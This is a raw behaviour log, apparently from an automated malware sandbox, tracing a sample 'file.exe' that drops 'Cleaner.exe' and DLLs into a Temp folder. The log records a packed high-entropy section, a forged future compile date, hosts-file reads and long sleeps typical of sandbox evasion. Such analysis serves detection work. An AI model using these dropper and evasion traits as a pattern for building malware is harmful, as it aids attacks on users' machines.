                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
                Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe
                Source: Cleaner.exe.0.drStatic PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
                Source: initial sampleStatic PE information: section name: .text entropy: 7.920922021912582
                Source: initial sampleStatic PE information: section name: .text entropy: 7.920922021912582
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe TID: 5340Thread sleep count: 119 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 5340Thread sleep time: -71400s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 4692Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dllJump to dropped file
